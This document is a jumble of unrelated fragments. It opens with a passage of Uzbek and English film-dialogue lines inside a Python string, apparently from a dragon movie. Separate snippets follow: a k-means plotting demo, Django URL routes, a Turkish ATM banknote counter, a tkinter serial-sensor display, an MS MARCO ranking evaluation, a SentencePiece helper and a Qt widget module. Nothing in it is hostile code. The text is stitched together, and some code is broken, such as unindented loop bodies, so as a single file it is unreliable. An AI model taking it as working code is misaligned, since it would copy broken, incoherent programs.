yakkaxon
sirg'alish
qulflangan dumi qutqarish manevralarini juda beparvo qiladi
kechirim istaysizmi
shuning uchun ham sen shivirlayapsan, katta chaqaloq
Xo'sh, buni sinab ko'ring
Oh, siz hali ham buni his qilyapsizmi?
butun qalbimdan pushaymon bo'ldimmi?
va xunuk
Bilasizmi, bu yuvilmaydi
nima deb o'ylaysiz?
g'alati shivirlab o'lim yoki toshlar ichida
pichirlash
Balki, biz nihoyat boshqa Night Furyni kuzatib boramiz
bu narsa emasmi?
hech narsa bo'lmaydi
faqat davom eting
yana nima
otamdan qochish
sen buni yaxshi ko'rasan
uyingizda dahshatli dahshatlar kuylayapti
Men nonushta qilyapman, dunyo bilan hamma narsa to'g'ri deb o'ylayman, va men tushunaman
Boshlash uchun men kun bo'yi xafa bo'ldim
bu haqiqatan ham xushomadgo'ylik
sen Berkning faxrisan, o'g'lim
men ham o'zimdan juda ta'sirlandim
va hech bir boshliq yaxshiroq voris so'rashga qodir emas edi
qaror qildim
sezgir
bu katta mas'uliyat
Bu so'zlar, qishloqni rejalashtirish va boshqarish - bu uning ishi
Menimcha, siz bu fikrni yo'qotdingiz
qanday sharaf
juda hayajonlangan bo'lardim
men hali ham qidiraman
Men otam emasligimni bilaman
bu meni nima qiladi
yaqin turing
hushyor bo'ling
quyruqni tomosha qiling
quyruq
oyoqlarini yuqoriga bog'lab qo'ying
ularning hammasi birdaniga ketdi deb o'yladim
Bizning omadimiz yaxshi tomonga burilganga o'xshaydi, yigitlar
Qarang, biz hech qanday muammoni xohlamaymiz
portlatilgan
tuzoq
yashirincha
qutqarish
siz kechagi o'g'ri do'stingizdan boshqasini nazarda tutyapsizmi?
muz tupurish
lekin bizda hali to'ldirish uchun kvota bor
Sizningcha, bu tartibsizlikni drago Bludvistga qanday tushuntiramiz
siz aytgan biror narsa mantiqiymi?
u ertaga o'z qo'shini uchun ajdarlarning yangi partiyasini kutmoqda
va Drago uzr so'ramaydi
va'da qildi
ancha kam
biz ajdaho o'g'ri haqida hech narsa bilmaymiz
g'alati
dushman
Oh, mening odobim qani
eng yaxshi ajdaho tuzoqchi tirik
qo'lga olish
shoshiling, yigitlar
siz hech qachon bu ajdarlarni ushlab turmaysiz
ehtimol u hozirgacha dunyoning chetidan uchib ketgan
Siz o'sha bolaning qishloqni boshqarishini xohlaysiz
siz hali ham pensiyani kechiktirishingiz mumkin
kim nihoyat ishga chiqishga qaror qildi
Kechirasiz, ushlab turdim
Menga aytmoqchi bo'lgan narsa?
Siz o'ylayotgan narsa unchalik emas, lekin ha
birinchi vazifasi o'z xalqi oldida
Xo'sh, biz faqat yolg'iz gaplasha olamizmi?
Hey, men sizdan oldinda edim
agar gaplasha olsak
Men baland pog'onali va katta saqlash joyiga ega yuqori o'rindiqlardan birini xohlayman
ota, bu aslida egar yasashdan ko'ra muhimroq
xalqingizga xizmat qilish borasida hech qanday vazifa juda kichik emas
siz qurbonning yana o'lishiga yo'l qo'ydingiz
siz asrab olmoqchisiz
uzoqlashing
Men sizga haqiqatan ham biz uchrashgan yangi er haqida aytib berishim kerak
biz bilish uchun atrofga yopishmadik
Bu odamlar, ayniqsa, do'stona emas edilar
Sizning Night Fury va Deadly Nadder ularni olib kelmadi
tomlarning tepasida
tepaliklar
bu bolalar tuzoqchi edi
siz ularning qal'asini ko'rishingiz kerak edi
g'alati edi
va eng yomoni, ular biz buni qildik deb o'yladilar
hamma ham bu hayot tarzini qadrlamaydi
eng yaxshisi o'zimizniki.
bundan tashqari, siz o'z vaqtingizni yanada muhimroq ishlatasiz
bir marta biz katta e'lon qilamiz
agar u ajdarimni olmoqchi bo'lsa, men uning mushtini yuzim bilan qonga to'kaman
siz shunchalik ahmoqsiz
eshiklarni muhrlab qo'ying
bo'ron eshiklarini pastga tushiring
kuting, chunki siz bilgan bir yigit uzoq mamlakatda muammo tug'dirmoqda
chunki Drago Bludvist vijdonsiz yoki rahm -shafqatsiz jinnidir
ularni qalamlariga joylashtiring
keyin u erga qaytamiz
biz orolni mustahkamlaymiz
tinchlikni saqlash bizning burchimiz
tinchlik tugadi
Men sizni urushga tayyorlashim kerak
aql
otxonalarni mustahkamlang
har bir do'konni mahkamlang
Men .. Kerak
ko'zingizni yuming, bolalar
Bu shamol bilan biz Dragonga tong otguncha etib boramiz
Yaxshisi, biz bu kemani ajdarlarga to'ldiramiz va tezda
halol bo'lish vaqti emas
port choragidan tashqarida
ularga to'r, yigitlar
ularni pastga tushiring
chap tomonda
va men bo'sh qoldik, deb qo'rqardim
taslim bo'lamiz
eng zo'r
Bu xo'jayinni xursand qilishi kerak
bizni kechir
ajdarlar chayqalgan joylarga unchalik ahamiyat bermaydilar
ular faqat sen bilan uchrashishadi
muammo
Agar siz yog'ochdan yasalgan qayiqlarni qilmasangiz, qanday qilib sizning suzishingiz qurolli mahbuslarga ega bo'lolmaydi, ular sizni o'zlaridan biri sifatida ko'rsalar, hatto eng mazali ajdarlarni ham o'rgatish mumkin.
u haqiqatan ham ishontira oladi
Agar siz uning sadoqatini qo'lga kiritgan bo'lsangiz, ajdaho siz uchun hech narsa qilmaydi
qarang, men qanchalik yaxshi himoya qilaman va ta'minlayman
hamma to'rlar bilan nima bor?
yaqin
olovingizni ushlab turing
biz sizni qutqarish uchun keldik
yetarli
Xo'sh, siz noto'g'ri kemani tanlamadingizmi?
bu narsani mendan oling
men buni tushundim
egarlang
hamma mas'uliyatsizlikdan
Men ajdarlarimizni himoya qilishga va urushni to'xtatishga harakat qilaman
qanday qilib bu mas'uliyatsizlik
biz hammamiz duch kelgan ajdaho balosini muhokama qilish uchun boshliqlarning katta yig'ilishi bo'lib o'tdi
bizning oramizga begona erdan, izlari bilan qoplangan va ajdaho terisiga burkangan begona keldi.
izlar
taralgan
plash
u qo'lida qurol yo'q edi va ohista gapirdi
insoniyatni ajdarlarning zulmidan ozod qilishga bag'ishlangan
biz ta'zim qilib, unga ergashishni tanladik
biz ham kulib yubordik
qadar
yig'lab yubordi
tushdi
yonayotgan
Men qochgan yagona odam edim
sababsiz o'ldirgan erkaklar bilan mulohaza yuritib bo'lmaydi
men hali ham harakat qilaman
qolganlarni Berkga qaytaring
Menda bir kunlik qo'zg'olon bor edi
keskin harakatlar yo'q
to'xtab tur
siz mening ajdarimni o'sha erda qoldirdingiz
u cho'kib ketadi
biz ajdarimga qaytib ketishimiz kerak
ajdaho o'g'ri
Siz haqiqatan ham meni o'sha erda xavotirga solgansiz
bo'lishi mumkinmi?
bu qanday mumkin?
siz faqat go'dak edingiz
cho'chqa boshi
xuddi onasi kabi
u ham hech qachon tura olmasdi
Aytmoqchimanki, bundan ham yomon kombinatsiya bo'lishi mumkin
qachon siz o'jar va aqlsiz bo'lganingizni o'ylaganimda
qanday aqldan ozganini tushunasizmi?
tushunish
aqldan ozgan
Siz ularni qutqardingiz
aql bovar qilmaydigan
xafa bo'lmaysiz
boshimni aylantirish, ochig'ini aytganda, biroz ko'proq
vahshiy
hushyor
aqldan ozgan
hech bo'lmaganda men zerikmayman, to'g'rimi
Xo'sh, menimcha, bu aniq bir narsa
oh, aql bovar qilmas
u, ehtimol, o'z turining oxirgisi bo'lishi mumkin
ajablanarli emas, siz juda yaxshi birga bo'ldingiz
va tortiladigan tishlar
qanday boshqargansiz
yarador
Jekning qanoti ustara bilan kesilgan edi
qo'rqqan
u meni qaytarib oldi
tez orada, uyga qaytgan har bir odamning o'z ajdarlari bor edi
agar iloji bo'lsa edi
lekin odamlar o'zgarishga qodir emas
tinchlik mumkin edi
siz yomonlashtirasiz
bu juda mashhur bo'lmagan fikr edi
beshikda
Men sizni himoya qilishga shoshildim
lekin men ko'rgan hamma narsa men ishongan narsaning isboti edi
Bu yovuz hayvon emas, balki aqlli, muloyim ijod, uning ruhi mening jonimni aks ettirardi
to'xtab tur
siz va otangiz o'sha kecha deyarli vafot etdilar
chunki men ajdarni o'ldira olmadim
uzoqlashish yuragimni sindirib tashladi, lekin agar men qilsam, siz xavfsizroq bo'lishingizga ishonardim
qanday tirik qoldingiz?
Jek hech qachon menga yomonlik qilishni xohlamagan
u meni bu erga tegishli deb o'ylagan bo'lishi kerak
hali ham mavjud bo'lgan juda kam sonli kishilardan biri
g'amxo'rlik
orasida
lekin, men siz uchun yuz sochlarini o'stirdim
yashirinmoq
buni tartibga solish mumkin edi
olib kelmoq
qaytadan boshlashimiz mumkinmi?
Endi siz qattiq burilishlarni qilishingiz mumkin
bizni bog'laydi
mendan tush
bu erda isinish
arqonlarni tushiring
Dragoda ular yo'q
menga ishoning
Berk taxtining vorisi
barcha tayyorgarlikni to'xtating
erning ko'proq rivojlanish xilma -xilligi
uni faqat qoziqqa qo'shing
qoziq
siz buni olmoqchi bo'lishingiz mumkin
Men ko'p marta jangni to'xtatishni, boshqa javob topishni iltimos qildim, lekin sizlardan hech kim quloq solmadimi?
Bilaman, men senga Jekni yolg'iz tarbiyalash uchun qoldirganman, lekin u mensiz yaxshi bo'lardi deb o'ylagandim va xato qildim
men seni yo'qotgan kunim kabi go'zalsan
bu kun yomonlashishi mumkinmi?
boshqalarni ogohlantir
achinarli
har bir tuzoqni tekshiring
jim bo'lishda davom eting
endi yaxshilikni qaytarishga ijozat bering
siz buni hech qachon tan olmaysiz
yirtqich dengizlar
cho'kish qo'rquvi bilan
va hayot to'lqinlarini quvonch bilan minib
na kuygan o'g'il, na sovuq
va meni abadiy sev
mening azizim, azizim
sizning kuchli so'zlaringiz meni hayratda qoldirdi
ularni kesib tashlang
u qanday sharmandalikni his qilishi kerak
dunyoni boshqarish uchun
ular odamlarni birlashtira oladigan mehribon, ajoyib ijodkorlar
yoki ularni ajratib oling
Men qo'rquvda yashash nima ekanligini bilaman,
lekin bolaligida ham
hech narsasiz qoldi
men ajdarlardan qo'rqishdan ustun turishga va bu dunyo odamlarini ozod qilishga qasam ichdim
qutulmoq
hech bir ajdaho Alfaning buyrug'iga qarshi tura olmaydi
haqiqiy kuchga guvoh bo'ling
undan chiqib ketish
odamlarni to'plang va meni Berkda kutib oling
va men, men o'ylagan tinchlikparvar emas
siz juda yomon narsa edingiz
juda zaif, juda nozik
Men bunga erisha olmasligingizdan qo'rqardim
u hech qachon shubha qilmagan
ajdaho ruhi
Men otam bo'lishdan juda qo'rqardim ADAMGA OXSHASHDAN
asosan men hech qachon qila olmayman deb o'ylaganim uchun
qanday qilib kimgadir aylanasiz
jasur
fidoyi
O'ylaymanki, siz faqat urinib ko'rishingiz mumkin
Ba'zilar bu noto'g'ri o'ylangan deb taxmin qilishlari mumkin
mumkin emas
endi sizni hech kim himoya qila olmaydi
Men ajablantira olmaydigan tirik ajdaho yo'q
Albatta, sizdan qutulish qiyin, men aytaman
ular sizni shunday qilishga majburlashdi
kutib turing
deyarli u erda do'stim
Menga ishonasanmi?
bitta kabi
Siz meni hayratda qoldirishdan to'xtamaysiz
u erda juda yaxshi ajdaho janjallashdi
hurmatga sazovor bo'lardim
sizning otangiz, u ham men kabi faxrlanardi
siz hali ham shunday qilyapsiz
bu kulgili
biroz oyoq osti qilingan va busted va muz bilan qoplangan, lekin u uy
bizga hujum qilganlar tinimsiz va aqldan ozgan"""
b = f"""granted, it may not look like much, but this wet heap of rock pack
more than a few surprises
just not for the faint of heart
faint
you, see where most folks enjoy hobbies like whittling or needlepoint, we dragon racing prefer
folks
a little something we like to call dragon racing
it's starting to stink around here
stink
nope, still hates you.
let's blow this place
blow
scared him off with the big talk, didn't you
didn't she try to bury you alive?
only for a few hours
now, dragons used to be a bit of a problem here, but that was five years ago
and, really, why would't they
we have custom stables, all you can eat feeding stations, a full service dragon wash
even top of the line fire prevention, if i do say so myself
we can still win this thing
up
here you go, darling
except for me
quit trying to steal all my glory
always ruining everything
that's my future daughter in law
berk is pretty much perfect
all of my hard work has paid off
the world just got a whole lot bigger
you want to give this another shot
this is amazing
no longer amazing
that really came out of nowhere
we got to work on your solo gliding there
solo
gliding
locked up tail makes for some pretty sloppy rescue maneuvers
do you want an apology
is that why you're pout, big baby boo
well, try this on
oh, you feeling it yet?
picking up on all my geartfelt remorse?
and it's ugly
you know that doesn't wash out
what do you reckon
the odd whispering death or twho in the rocks
whispering
maybe we'll finally track down another Night Fury
wouldn't that be something
wouldn't something
just keep going
what else
avoiding my dad
you're gonna love this
terible terrors are singing on the rooftop
i saunter down to breakfast thinking all is right with the world, and i get
i got a whole day of goofing off to get started
that's a really flattering impersonation
you're the pride of Berk, son
i'm pretty impressed with myself, too
and since no chief could ask for a better successor
i've decided
sensitive
it's a lot of responsibility
all those speeches and planning and running the village that's his thing
i think you're missing the point
what an honor
i'd be pretty excited
i'm still looking
i know that i'm not my father
what does that make me
stay close
look out
watch the tail
tail
tie those legs up
thought they were all gone for good
looks like our luck's had a turn for the better, lads
look, we don't want any trouble
blasted
trap
sneaking
rescue
you mean other than your thieving friend from last night?
ice-spitting
but we still have a quota to fill
how do you suppose we explain this mess to drago Bludvist
does anything you say make sense?
he's expecting a new shipment of dragons for his army by tomorrow
and Drago don't take well to excuses
promised
far less
we don't know anything about a dragon thief
strange
hostile
oh, where are my manners
finest dragon trapper alive
capture
rush'em, lads
you will never hold on to those dragons
he's probably flown off the edge of the world by now
you sure want that kid running the village
you can still delay your retirement
who finally decided to show up for work
sorry, got held up
something you're itching to tell me?
uh, not quite the thing you're thinking of, but, yes
a chief first duty is to his people
well, can we just talk in private for
hey, i was ahead of you
if we could just talk
i want one of those high seaters with lots of spikes and a big storage compartment
dad, this is actually a little more important than building saddles
no task is too small when it comes to serving your people
you let the forge die down again
you're going up for adoption
have away
i really need to tell you about this neew land we came across
we didn't stick around to find out
these folks weren't particularly friendly
your Night Fury and Deadly Nadder didn't bring them
cheering to the rooftops
hills
these guys were trappers
you should have seen their fort
it was weird
and worst of all, they thought we did it
not everyone appreciates this way of life
best we keep to our own.
besides, you'll have more important uses for your time
once we make the big announcement
i'll bloody his fist with my face if he tries to take my dragon
you're such a moron
seal the gates
lower the storm doors
wait,because some guy you knew is stirring up trouble in some faraway land
because Drago Bludvist is a madman without conscience or without mercy
get them into their pens
then let's ride back out there
we fortify the island
it's our duty to keep the peace
peace is over
i must prepare you for war
mind
secure the stables
latch every stall
i have to
keep your eyes peeled, lads
with this wind, we'll reach Drago by daybreak
so best we fill this ship up with dragons, and quick
it's no time to be picky
off the port quarter
net them, lads
take them down
up on the left
and here i was, worried we might turn up empty handed
we give up
finest
that ought to make the boss happy
excuse us
the dragons don't really care for scamped spaces
they'll just hang out with you
trouble
unless you do that wooden boats how is your swimming can't have armed prisoners once they see you as one of their own, even the tastiest dragons can be trained
he can be really persuasive
once you've earned his loyalty, there is nothing a dragon won't do for you
see how well i protect and provide
what is with all the nets?
close
hold your fire
we're here to rescue you
enough
well, didn't you just pick the wrong ship
get this thing off me
that's what i figured
saddle up
of all the irresponsible
i'm trying to protect our dragons and stop a war
how is that irresponsible
there was a great gathering of chieftains to discuss the dragon scouge we all faced
into our midst came a stranger from a strange land, covered in scars and draped in a cloak of dragon skin
scars
draped
cloak
he carried no weapon and spoke softly
devoted to freeing mankind from the tyranny of dragons
we chose to bow down and follow him
we laughed too
until
cried
descended
burning
i was the only one to escape
men who kill without reason cannot be reasoned with
i'm still going to try
leak the others back to Berk
i've had enough mutiny for one day
no sudden moves
hold on
you left my dragon back there
he'll drown
we have to head back for my dragon
the dragon thief
you really had me worried there
could it be?
how is this possible?
you were only a babe
boar headed
just like his mother
she could never stay put, either
i mean, could there be a worse combination
when i think of how stubborn and senseless you were back in the day
do you grasp how insane it sounds
grasp
insane
you've been rescuing them
unbelivable
you're not upset
it's a bit much to get my head around, to be frank
feral
vigilante
crazy
at least i'm not boring, right
well, i suppose there is that one specific thing
oh, incredible
he might very well be the last of his kind
no wonder you get along so well
and retractable teeth
how did you manage
wounded
Jeck had her wing sliced by razor netting
scared
he got me back
pretty soon, everyone back home had dragons of their own
if only it were possible
but people are not capable of change
peace was possible
you'll make it worse
it was a very unpopular opinion
in the cradle
i rushed to protect you
but what i saw was proof of everything i believed
this wasn't a vicious beast, but an intelligent, gentle crearure, whose soul reflected my own
hold on
you and your father nearly died that night
all because i couldn't kill a dragon
it broke my heart to stay away, but i belived you'd be safer if i did
how did you survive
Jack never meant to harm me
he must have thought i belonged here
one of the very few that still exist
care
among
but, i grew facial hair for you
sneak
that could be arranged
fetch
can we start over?
now you can make those tight turns
it bonds us
get off me
keeping warm up here
drop the ropes
Drago doesn't have them after all
trust me
heir to the throne of Berk
stop all preparations
more of the earth shattering development variety
just add it to pile
pile
you might want to take this one
i pleaded so many times to stop the fighting, to find another answer, but did any of you listen?
i know that i left you to raise Jeck alone, but i thought he'd be better off without me, and i was wrong
you're as beautiful as the day i lost you
could this day get any worse?
warn the others
pathetic
check every trap
keep cranking
now let me return the favor
you'd never even recognize it
savage seas
with ne'er a fear of drowning
and gladly ride the waves of life
no scorching son nor freezing cold
and love me for eternity
my dearest one, my darling dear
your mighty words astound me
cut them down
what shame he must feel
to rule the world
they are kind, amazing creaturs that can bring people together
or teat them apart
i know what it is to live in fear,
but even as a boy
left with nothing
i vowed to rise above the fear of dragons and liberate the people of this world
rid
no dragon can resist the Alpha's command
witness true strength
snap out of it
gather the men and meet me at berk
and i', not the peacekeeper i thought i was
you were such a wee thing
so frail, so fragile
i feared you wouldn't make it
he never doubted
the soul of a dragon
i was so afraid of becoming my dad ADAMGA OXSHASHDAN
mostly because i thought i never could
how do you become someone
brave
selfless
i guess you can only try
some might suggest this is poorly conceived
not possible
no one can protect you now
there isn't a dragon alive that i can't wrangle
you certainly are hard to get rid of, i'll say that
they made you do it
hang on
almost there budy
do you trust me?
as one
you never cease to amaze me
that was some pretty fine dragon wrangling back there
i'd be honored
your father, he'd be every bit as proud as i am
you're still doing that one
that's hilarious
a bit trampled and busted and covered in ice, but it's home
those who attacked us are relentless and crazy"""
a = a.split("\n")
b = b.split("\n")
# print(a[1])
e = ""
d = "-"
for c in range(len(a)):
print(b[c]+d+a[c])
|
15,639 | 47dd6bd656048f28fe58ea19921a69fac06e86fd | #!/usr/bin/python
# -*- coding: utf-8 -*-
# @Time : 2020/2/13 0013 11:25
# @Author : honwaii
# @Email : honwaii@126.com
# @File : k_means_model.py
import matplotlib.pyplot as plt
import random
from collections import defaultdict
from sklearn.cluster import KMeans
# 生成2-D待分类数据
def generate_clustering_data():
X1 = [random.randint(0, 1000) for _ in range(0, 1000)]
X2 = [random.randint(0, 1000) for _ in range(0, 1000)]
return [[x1, x2] for x1, x2 in zip(X1, X2)]
def clustering(data):
return KMeans(n_clusters=6, max_iter=1000).fit(data)
def draw_graph(cluster, locations):
clustered_locations = defaultdict(list)
colors = ['red', 'blue', 'orange', 'grey', 'black', 'yellow']
# 数据所属分类和颜色标记可以在一个for循环内完成,不必像课程代码中一样分开。
for label, location in zip(cluster.labels_, locations):
clustered_locations[label].append(location)
plt.scatter(*location, c=colors[label])
# 标记聚类中心点的颜色,这里颜色不设定,其会自动随机选择颜色,不会撞色
for center in cluster.cluster_centers_:
plt.scatter(*center, s=100)
plt.show()
return
# 1. 生成待分类数据
clustering_data = generate_clustering_data()
# 2. 待分类数据的模型
cluster = clustering(clustering_data)
# 3. 绘制聚类数据图
draw_graph(cluster, clustering_data)
|
15,640 | 089be3a1b03ff3c3d627b593c4dc37d43bab75a3 | from django.urls import path
from . import views
urlpatterns = [
path('comment/', views.CreateCommentView.as_view()),
path('comments/', views.ListCommentView.as_view()),
path('comment/update_delete/<id>/', views.DeleteUpdateCommentView.as_view()),
path('patient/', views.PatientProfileView.as_view()),
path('patient/public/', views.PublicPatientProfileView.as_view()),
path('doctor/', views.DoctorProfileView.as_view()),
path('doctor/public/', views.PublicDoctorProfileView.as_view()),
path('save/', views.SaveProfileView.as_view()),
path('remove_save/<id>/', views.RemoveSavedProfileView.as_view()),
path('is_saved/', views.IsProfileSavedView.as_view()),
path('list_doctors/', views.ListDoctorsView.as_view()),
path('change_visit_duration/', views.ChangeVisitDurationTimeView.as_view()),
path('doctor/update/<str:username>/', views.UpdateDoctorProfView.as_view()),
path('patient/update/<str:username>/', views.UpdatePatientProfView.as_view()),
path('change_password/',views.ChangePasswordView.as_view()),
]
|
15,641 | 4a543533e7720a7beea23dfa587653ccf7d1b618 | #5 Lira ve Katı Parayı En Az Banknotla Veren Algoritma Denemesi
BANKNOTLAR=[0,0,0,0,0,0] #[5,10,20,50,100,200]
def BanknotSay(para):
if para%5 !=0:
print("ATM'nin sadece banknot çıkışı olduğu için 5 TL ve katlarını verebiliyoruz.")
exit()
if para >= 200:
BANKNOTLAR[5] = int(para/200)
para %= 200
if para >= 100:
BANKNOTLAR[4] = int(para/100)
para %= 100
if para >= 50:
BANKNOTLAR[3] = int(para/50)
para %= 50
if para >= 20:
BANKNOTLAR[2] = int(para/20)
para %= 20
if para >= 10:
BANKNOTLAR[1] = int(para/10)
para %= 10
if para >= 5:
BANKNOTLAR[0] = int(para/5)
para %= 5
return para
try:
miktar = int(input("Çekmek istediğiniz miktarı giriniz (5 Tl ve katları):"))
except ValueError:
print("Lütfen sadece rakamlardan oluşan bir sayı giriniz!")
exit()
BanknotSay(miktar)
print(str(BANKNOTLAR[5])+" Tane 200 Tl lik Banknot")
print(str(BANKNOTLAR[4])+" Tane 100 Tl lik Banknot")
print(str(BANKNOTLAR[3])+" Tane 50 Tl lik Banknot")
print(str(BANKNOTLAR[2])+" Tane 20 Tl lik Banknot")
print(str(BANKNOTLAR[1])+" Tane 10 Tl lik Banknot")
print(str(BANKNOTLAR[0])+" Tane 5 Tl lik Banknot")
|
15,642 | ac30a767ada52118ddc302a7ef77373cadc01788 | list=[4,2,6]
sum=0
for i in list:
sum+=i
print(sum) |
15,643 | e6ecaa66be766b13891a4539b34ab8d218aebf78 | import serial
import sys
import time
import tkinter as tk
root = tk.Tk()
path="interior.jpg"
background_image=tk.PhotoImage(path)
background_label = tk.Label(root, image=background_image)
background_label.place(x=0, y=0, relwidth=1, relheight=1)
root.geometry("{0}x{1}+0+0".format(root.winfo_screenwidth(), root.winfo_screenheight()))
ser = serial.Serial('com3', 9600, timeout=1)
def start_counter(label,label2,label3):
def update_func():
global reading
reading =ser.readline().decode('utf-8')[:-2]
reading=str(reading)
print(reading)
arr=reading.split(',')
label.config(text=str(arr[0]))
label2.config(text=str(arr[1]))
label3.config(text=str(arr[2]))
label.after(1000, update_func) # 1000ms
time.sleep(1)
update_func()
root.title("Room Monitoring System")
temp=tk.Label(root,text="ROOM MONITORING SYSTEM",font=100, fg="blue").place(x=500,y=150)
temp=tk.Label(root,text="TEMPERATURE",font=40, fg="blue").place(x=100,y=300)
temp=tk.Label(root,text="HUMIDITY", font=40,fg="blue").place(x=500,y=300)
temp=tk.Label(root,text="GAS / SMOKE",font=0 ,fg="blue").place(x=900,y=300)
label = tk.Label(root, font=20,fg="red")
label.place(x=100,y=400)
label2 = tk.Label(root,font=20 ,fg="green")
label2.place(x=500,y=400)
label3 = tk.Label(root,font=20 ,fg="grey")
label3.place(x=900,y=400)
start_counter(label,label2,label3)
button = tk.Button(root, text='Stop', width=30, command=root.destroy)
button.place(x=600,y=600)
root.mainloop()
|
15,644 | ea78b12f73d189c765c715dde842bb22ac8b49d5 | import pickle
with open("data/qrels.dev.small.pkl", 'rb') as f:
qrels = pickle.load(f)
with open("top1000.dev.sorted.ranks.pkl", 'rb') as f:
ranks = pickle.load(f)
Q = len(qrels)
print("Total number of queries: {}".format(Q))
print("Number of queries considered: {}".format(len(ranks)))
# Calculate Mean Average Precision #
def PrecisionAtK(qid, k):
relevants = qrels[qid]
pids = ranks[qid][:k]
number_of_relevants_retrieved = 0
for pid in pids:
if pid in relevants:
number_of_relevants_retrieved += 1
return number_of_relevants_retrieved/k
def AveragePrecision(qid):
relevants = qrels[qid]
soma = 0
for pid in relevants:
try:
rank = ranks[qid].index(pid)+1
soma += PrecisionAtK(qid, rank)
except:
continue
return soma/len(relevants)
soma = 0
for qid in qrels:
soma += AveragePrecision(qid)
print("MAP: {}".format(soma/Q))
# Calculate Mean Reciprocal Rank and MRR@10 #
def ReciprocalRank(qid, k):
relevants = qrels[qid]
try:
pids = ranks[qid][:k]
for i, pid in enumerate(pids):
if pid in relevants:
return 1/(i+1)
except:
return 0
return 0
soma_mrr = 0
soma_mrr10 = 0
for qid in qrels:
soma_mrr += ReciprocalRank(qid, 1000)
soma_mrr10 += ReciprocalRank(qid, 10)
print("MRR: {}".format(soma_mrr/Q))
print("MRR@10: {}".format(soma_mrr10/Q))
|
15,645 | 1d82a060eb4fb788aba3de69c60715846209c559 | # -*- coding: utf-8 -*-
'''
print 默认会加上换上
如果 print 以逗号结尾,则不加换行。
'''
print "没有换行",
print "到我这才换行"
|
15,646 | 6c8215f80fff5bf193b2660b0cc84b7ea43db67c | # MIT License
#
# Copyright (c) 2021 Soohwan Kim and Sangchun Ha and Soyoung Cho
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sentencepiece as spm
import shutil
SENTENCEPIECE_MODEL_PREFIX = "sp"
SENTENCEPIECE_MODEL_TYPE = "bpe"
def train_sentencepiece(transcripts, vocab_size: int = 3200, blank_token: str = '<blank>') -> None:
print('generate_sentencepiece_input..')
with open('sentencepiece_input.txt', 'w', encoding="utf-8") as f:
for transcript in transcripts:
f.write(f'{transcript}\n')
spm.SentencePieceTrainer.Train(
f"--input=sentencepiece_input.txt "
f"--model_prefix={SENTENCEPIECE_MODEL_PREFIX} "
f"--vocab_size={vocab_size} "
f"--model_type={SENTENCEPIECE_MODEL_TYPE} "
f"--pad_id=0 "
f"--bos_id=1 "
f"--eos_id=2 "
f"--unk_id=3 "
f"--user_defined_symbols={blank_token}"
)
def convert_subword(transcript: str, sp: spm.SentencePieceProcessor):
text = " ".join(sp.EncodeAsPieces(transcript))
label = " ".join([str(sp.PieceToId(token)) for token in text])
return text, label
def sentence_to_subwords(
audio_paths: list,
transcripts: list,
manifest_file_path: str,
sp_model_path: str = "sp.model"
) -> None:
print('sentence_to_subwords...')
if sp_model_path != f"{SENTENCEPIECE_MODEL_PREFIX}.model":
shutil.copy(f"{SENTENCEPIECE_MODEL_PREFIX}.model", sp_model_path)
sp = spm.SentencePieceProcessor()
sp.Load(sp_model_path)
with open(manifest_file_path, 'w', encoding="utf-8") as f:
for audio_path, transcript in zip(audio_paths, transcripts):
audio_path = audio_path.replace('txt', 'pcm')
text, label = convert_subword(transcript, sp)
f.write(f"{audio_path}\t{text}\t{label}\n")
|
15,647 | 5576ff8ae23acdbe50e995df909f7433bbbd64ed | # -*- coding: utf-8 -*-
"""
Created the 30/01/2023
@author: Sebastien Weber
"""
from qtpy import QtWidgets, QtCore, QtSvg, QtGui
from pymodaq.daq_utils.config import Config
from pyqtgraph.widgets.SpinBox import SpinBox
config = Config()
class SpinBox(SpinBox):
"""
In case I want to add pyqtgraph spinbox functionalities
"""
def __init__(self, *args, font_size=None, min_height=20, readonly=True, **kwargs):
super().__init__(*args, **kwargs)
if font_size is not None:
font = QtGui.QFont()
font.setPointSize(font_size)
self.setFont(font)
self.setMinimumHeight(min_height)
self.setReadOnly(readonly)
self.setButtonSymbols(QtWidgets.QAbstractSpinBox.NoButtons)
class LabelSpinBox(QtWidgets.QWidget):
value_changed = QtCore.Signal(float)
def __init__(self, parent: QtWidgets.QWidget, label: str, readonly: bool):
super().__init__(parent)
self.setLayout(QtWidgets.QVBoxLayout())
self.label = QtWidgets.QLabel(f'{label}:')
self.spinbox = SpinBox(self, font_size=20, readonly=True)
self.spinbox.setDecimals(3)
self.layout().addWidget(self.label)
self.layout().addWidget(self.spinbox)
self.setMinimumHeight(70)
@property
def value(self) -> float:
self.spinbox.value()
@value.setter
def value(self, value: float):
self.spinbox.setValue(value)
class SetupSVG:
def __init__(self, parent_widget: QtWidgets.QWidget):
super().__init__()
self.parent = parent_widget
self.svg_widget = QtSvg.QSvgWidget('setup.svg')
self.settings_widget = QtWidgets.QWidget()
self.settings_widget.setLayout(QtWidgets.QVBoxLayout())
self.tangerine_power = LabelSpinBox(self.svg_widget, 'Power', True)
self.tangerine_rep_rate = LabelSpinBox(self.svg_widget, 'Rep. Rate', True)
self.compressor_delay = LabelSpinBox(self.svg_widget, 'Delay Comp.', True)
self.nopa_angle = LabelSpinBox(self.svg_widget, 'Angle', True)
self.nopa_delay = LabelSpinBox(self.svg_widget, 'Delay NOPA', True)
self._all = dict(power=self.tangerine_power, rep_rate=self.tangerine_rep_rate,
nopa_angle=self.nopa_angle, nopa_delay=self.nopa_delay)
self.setup_ui()
def add_settings(self, tree):
self.settings_widget.layout().addWidget(tree)
def setup_ui(self):
self.parent.setLayout(QtWidgets.QHBoxLayout())
self.svg_widget.setFixedSize(1000, 700)
self.parent.layout().addWidget(self.settings_widget)
self.parent.layout().addWidget(self.svg_widget)
